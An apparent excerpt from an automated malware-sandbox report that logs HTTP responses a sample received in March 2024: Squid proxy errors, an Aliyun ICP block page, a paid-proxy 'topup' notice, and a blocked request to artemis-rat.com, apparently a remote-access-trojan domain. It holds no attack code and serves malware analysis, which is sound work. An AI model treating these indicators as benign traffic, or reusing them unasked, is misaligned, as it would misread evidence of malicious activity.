22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/5.6Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:41 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_CONNECT_FAIL 101Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:41 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailable
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:16:42 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:16:42 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 15:16:42 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 